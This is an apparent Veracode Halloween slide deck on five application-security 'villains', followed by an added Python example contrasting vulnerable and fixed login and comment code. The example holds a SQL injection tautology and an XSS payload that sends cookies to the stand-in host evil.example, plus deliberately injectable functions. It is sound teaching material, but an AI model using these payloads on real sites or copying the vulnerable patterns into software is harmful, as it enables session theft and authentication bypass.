
The Top 5 AppSec Villains (Happy Halloween from Veracode!)

We’ve all been dealing with all kinds of AppSec villains for a long time – but perhaps you’ve never visualized them in exactly this way. Check out this fun presentation to learn about the top 5 villains – and how you can defeat them. Do you dare enter this haunted house?

Published in: Education

  1. The Top 5 Application Security Villains. TOUR THE HAUNTED HOUSE. DARE TO ENTER TO ENCOUNTER THEM. HAPPY HALLOWEEN! From Veracode
  2. THIS WAY
  3. SQL INJECTION. Watch out! SQL injection breaches, like mummies, keep coming back to life. According to the 2014 Verizon DBIR, 80% of retail breaches targeting web applications exploit SQL injection vulnerabilities. Cyberattackers are constantly searching every nook and cranny of your web applications to find easily exploitable weak spots such as SQLi, a critical vulnerability that has been on the OWASP Top 10 forever!
  4. CROSS-SITE SCRIPTING (XSS). Another "greatest hit" from the OWASP Top 10, cross-site scripting allows a cyberattacker to inject arbitrary scripts into an unsuspecting website, which are then executed by the victim's browser. Just like Dracula's bite takes over your soul, XSS lets the attacker act as the victim within the vulnerable site, leaving users exposed to scary and malicious activities such as sensitive data theft, data tampering and session hijacking.
  5. THIRD-PARTY VENDORS. Recent high-profile breaches have shown that cyberattackers relish casting their evil spells on third-party vendors. This isn't surprising: 90% of third-party software doesn't comply with the OWASP Top 10, which makes it especially attractive to attackers who target third-party vendors as the path of least resistance into organizations. Once inside, they methodically traverse your network, casting spells to gain more powers and elevated privileges as they go.
  6. VULNERABLE OPEN SOURCE COMPONENTS. As we learned from Heartbleed and Shellshock, open source components often don't undergo the same level of security scrutiny as in-house software. In fact, open source and commercial third-party components contribute an average of 24 known vulnerabilities to every web application. Just like werewolves that start out as ordinary humans, "friendly" components are easily transformed into dangerous creatures that expose organizations to malevolent threats including data breaches, malware injection and DoS attacks.
  7. APPLICATIONS ARE THE NEW FRANKENSTEIN. Companies large and small, across all industries, rely on software innovation to drive their businesses. Just as Frankenstein's monster grew bigger and more powerful than its creator ever intended, we couldn't have predicted that our increased reliance on web, mobile, cloud and Internet of Things technologies would also lead to a massive increase in risk.
  8. Veracode's cloud-based service is a simpler and more scalable way to reduce application-layer risk across your global software infrastructure, including web, mobile and third-party applications. With Veracode, you can speed your innovations to market while defeating these vile application security villains along the way!
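The two "greatest hits" on slides 3 and 4 are easiest to understand side by side with their defeated forms. The following is an added example, not code from the Veracode slides: a toy login query and a toy comment renderer, each written first the way the villain likes it and then the way that defeats it. The in-memory users table, the account `alice`, the payload strings and the hostname `evil.example` are all constructed sample data for this example.

```python
"""Added example (not from the Veracode slides): the SQL injection and
cross-site scripting villains beside their defeated forms.
Standard library only; the users table and payloads are constructed data."""
import html
import sqlite3


def fresh_db() -> sqlite3.Connection:
    """Constructed sample data: an in-memory users table with one account."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 'correct horse')")
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # Villain: user input is spliced straight into the SQL text, so quote
    # characters in the input become part of the query's syntax.
    query = (f"SELECT COUNT(*) FROM users WHERE username = '{username}' "
             f"AND password = '{password}'")
    return conn.execute(query).fetchone()[0] > 0


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # Defeated: a parameterised query keeps the query text fixed and passes
    # the input as data, so a quote in the input is just a character.
    query = "SELECT COUNT(*) FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone()[0] > 0


def render_comment_vulnerable(comment: str) -> str:
    # Villain: untrusted text is concatenated into HTML, so a comment can
    # inject a <script> element that the victim's browser will execute.
    return f'<div class="comment">{comment}</div>'


def render_comment_safe(comment: str) -> str:
    # Defeated: escape untrusted text for the HTML body context, so '<'
    # becomes '&lt;' and the browser treats it as text rather than markup.
    return f'<div class="comment">{html.escape(comment, quote=True)}</div>'


# Constructed payloads. The SQLi tautology closes the password literal and
# appends OR '1'='1', so the WHERE clause matches every row without a password.
SQLI_PAYLOAD = "' OR '1'='1"
# The XSS payload ships the victim's cookies to an attacker host (hypothetical).
XSS_PAYLOAD = '<script>location="http://evil.example/?c="+document.cookie</script>'


def demo() -> dict:
    """Run both villains and both defences; returns which attacks succeeded."""
    conn = fresh_db()
    return {
        "sqli_vulnerable_bypassed": login_vulnerable(conn, "alice", SQLI_PAYLOAD),
        "sqli_safe_bypassed": login_safe(conn, "alice", SQLI_PAYLOAD),
        "xss_vulnerable_has_script": "<script>" in render_comment_vulnerable(XSS_PAYLOAD),
        "xss_safe_has_script": "<script>" in render_comment_safe(XSS_PAYLOAD),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

Two caveats a practitioner will want. Parameterisation only covers values; table and column names chosen by the user still need an allow-list, since a placeholder cannot stand in for an identifier. And `html.escape` is correct only for text placed in an HTML body or a quoted attribute; text that lands inside a `<script>` block, a URL or a CSS value needs the encoding for that context, which is why a templating engine with context-aware auto-escaping is the usual answer rather than hand-placed escape calls.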